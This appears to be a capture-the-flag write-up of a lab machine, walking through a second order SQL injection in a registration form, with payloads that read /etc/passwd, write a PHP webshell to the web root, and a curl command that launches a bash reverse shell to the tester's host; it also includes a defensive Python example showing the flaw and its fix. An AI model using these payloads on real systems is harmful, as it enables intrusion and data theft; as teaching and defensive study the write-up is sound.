Summary
This was an amazing machine created by ippsec that required "second order" SQL injection. That injection gives us the surface to write a webshell that passes commands to the back end, from which we execute a bash reverse shell. The initial user foothold then allows us to transfer linpeas, and from its output we find a password in the /var/www/html config.php file.
Tools used
Burpsuite
Linpeas
Process / techniques
SQL injection
SQL second order injection
Command injection
Webshell injection with PHP SQL
References:
Enumeration
We start off with a basic nmap scan that reports many ports, but only a few are open. The filtered ports are probably closed or blocked by a firewall. To be diligent I will start autorecon in the background to catch any information I may miss during this process.
A second and more in-depth scan with the -sC and -sV flags yields some helpful information. In particular we find that our webserver is running Apache httpd 2.4.48, which is very up to date. Port 8080 is running nginx but returns a 502.
-sC: Use default nmap enumeration scripts
-sV: Detect service versions
Website Enumeration
Jumping into the website on port 80 we see a very basic landing page with an immediate form, which is a strong hint that we need to conduct web form enumeration.
Let's start with some basic checks.
Dirbusting
Subdomain enumeration
Platform version
Page forms
SQL Injection flow
Enumerating for SQL injection is imperative when presented with a web form. Here we are fortunate to work through a second order SQL injection problem, which is a treat in the CTF/security world as it is rare. Being uncommon, it can seem difficult, but the concept and practical application are about as light as basic SQL injection.
Here is our process and workflow for the SQL injection, from enumeration to our reverse shell.
Single quote error based testing
Payload testing
Enumerate versions
user()
Read file
Write file - shell.php
Execute a reverse shell
1. Error based testing is a great way to start off our SQL enumeration. We start by dropping a single quote to see if there is an error or not. We of course see there is an error that reveals the web service is running out of the /var/www/html directory.
2. Payload testing: Here we pass common SQL payloads appended to our single quote. We know that our single quote is not being handled properly. We see that our data is stored in the backend and pushed to the front end on logging in, which is suggestive of second order SQL injection: the stored value is trusted when it is read back into a later query. We start dropping various payloads with a particular focus on union attacks, as we know our register form has 2 fields and is likely relying on a SQL Union statement.
Reference:
https://github.com/payloadbox/sql-injection-payload-list
3. Enumerate version: Here we send a POST form as user aaa and country Brazil. We intercept the request in Burpsuite and add a quote followed by UNION SELECT @@version ' to reveal the particular SQL DB, MariaDB.
4. user()
username=aaa&country=Brazil ' UNION SELECT user()'
5. Read file
username=aaa&country=Brazil ' UNION SELECT LOAD_FILE("/etc/passwd")'
6. Write file - shell.php
Test with normal file: username=aaa&country=Brazil' UNION SELECT "<?php booom ?>" INTO OUTFILE '/var/www/html/boom.php'-- -
username=aaa&country=Brazil' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
7. Execute a reverse shell
curl 10.129.95.235/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.44/6363 0>&1"'
The above is passed to the target backend host, which hands the cmd parameter to bash, and we successfully execute a bash reverse shell to our listener.
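To make the second order flaw behind steps 2 to 7 concrete from the defender's side, here is an added example (not the machine's code, which we never see) modelling the register/login flow the writeup infers: a parameterised INSERT that stores the quote safely, a later query that splices the stored country back into SQL by string formatting, and the fixed version. sqlite3 stands in for MariaDB so it runs offline, and sqlite_version() plays the role of @@version; the table and sample users are constructed.

```python
import sqlite3

# Constructed in-memory stand-in for the app's users table.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, country TEXT)")
    return conn

def register(conn, username, country):
    # The registration INSERT is parameterised, so a quote in `country`
    # is stored harmlessly. This is why first order tests look clean.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, country))
    conn.commit()

def users_in_country_vulnerable(conn, username):
    # Second order flaw: the country is read back from the database and
    # spliced into a new query by string formatting. The stored quote is
    # trusted because it came from "our own" database, not from the request.
    country = conn.execute(
        "SELECT country FROM users WHERE username = ?", (username,)
    ).fetchone()[0]
    query = f"SELECT username FROM users WHERE country = '{country}'"
    return [row[0] for row in conn.execute(query)]

def users_in_country_fixed(conn, username):
    # Hardened: every query is parameterised, including the one that
    # consumes data we previously stored. The quote is matched literally.
    country = conn.execute(
        "SELECT country FROM users WHERE username = ?", (username,)
    ).fetchone()[0]
    rows = conn.execute(
        "SELECT username FROM users WHERE country = ?", (country,)
    )
    return [row[0] for row in rows]

# Mirrors the writeup's "Brazil' UNION SELECT @@version" country value.
INJECTED_COUNTRY = "Brazil' UNION SELECT sqlite_version()-- -"

def demo():
    conn = setup_db()
    register(conn, "alice", "Brazil")
    register(conn, "aaa", INJECTED_COUNTRY)
    # Vulnerable path leaks the DB version; fixed path only matches the
    # literal stored string, i.e. the attacker's own row.
    return (users_in_country_vulnerable(conn, "aaa"),
            users_in_country_fixed(conn, "aaa"))
```

Mitigation follows directly: parameterise every query, not just the ones that take request input, and deny the application's DB account the FILE privilege so INTO OUTFILE and LOAD_FILE cannot be used even if an injection slips through.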
Root
As usual we start off by transferring the linpeas enumeration script to our target machine. This is performed by first spinning up a python3 simple HTTP server from the linpeas directory; this file server runs over port 8000 by default.
Once linpeas is uploaded we look through the output and make note of our top 10 noticeable possible privilege escalation artifacts.